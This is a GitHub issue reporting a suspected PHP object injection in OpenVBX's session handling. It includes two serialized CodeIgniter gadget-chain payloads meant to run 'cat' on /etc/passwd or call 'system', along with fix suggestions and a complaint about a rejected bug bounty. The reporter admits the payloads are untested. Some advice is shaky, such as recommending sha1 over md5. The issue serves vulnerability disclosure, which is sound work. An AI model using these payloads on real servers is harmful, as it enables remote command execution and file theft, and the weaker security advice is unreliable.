Skip to content
This repository has been archived by the owner on Mar 4, 2021. It is now read-only.

Php Object Injection #439

Open
devcoinfet opened this issue Jul 5, 2019 · 1 comment
Open

Php Object Injection #439

devcoinfet opened this issue Jul 5, 2019 · 1 comment

Comments

@devcoinfet
Copy link

devcoinfet commented Jul 5, 2019

1.)function sess_destroy()
2.)function _set_cookie($cookie_data = NULL)

https://github.com/twilio/OpenVBX/blob/7ed912adfc80aa7c5294cc47ebefb11b91ca6c6f/system/libraries/Session.php

Both make calls to a serialize function that appears controllable with a payload like this

attack_one = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:3:"cat";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:11:"/etc/passwd";}}"""

attack_two = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:6:"system";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}"""

not exact and may need tweaking just examples

========================================================================
#Impact
#encryption is off by default You are using what appears to be an md5 to verify the data was not modified like a csrf token
#what happens is you call _unserialize and for some reason decide to overload an insecure function by not securing it but just checking it
#than deciding to add an md5 to the end to verify it isn't tainted well with the original request intercepted we can now sign the md5
#and attempt to execute a php object injection attack.

#suggestions
#Never use a collidable hash like md5 to generate a nonce
#use something like sha1 and try to implement encryption by default with a random seed and make it diff for all
#never store critical data client side in an effort to save yourself resources like you guys did with openvbx
#and never trust any data that is provided by a user ever.

protected function _serialize($data)
{
if (!is_scalar($data))
{
$data = serialize($data);-> right here your overloading an insecure function with an insecure function in php this is very dangerous
}
return $data;
}

Also kindly tell me why this was rejected as a paying bounty on bug crowd for me and its an rce against one of your products with 200 plus customers?

FYI you bugcrowd team also said they weren't patching it is this standard practice to not pay for rce bounties when customers are using it i'm confused as well as at least patch it I mean You guys completely hid the fact I even reported it since it didn't fall under your program i am legally able to call you out on it here inf front of your customers.

I am not trying to be rude etc but I do what I do and barely get paid for it I dont take kindly to companies saying were not patching it and were not paying and we could care less people like me do care you have 200 customers out there possibly vulnerable and this was completely dismissed and in fact could be very serious.

@devcoinfet
Copy link
Author

I am actually seeing far more than those two i think are controllable sinks i am requesting you guys do a review of your code and let me know if this is exploitable me and a friend are setting up a lab to find out but either way your customers need to know this is possibly wrong

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant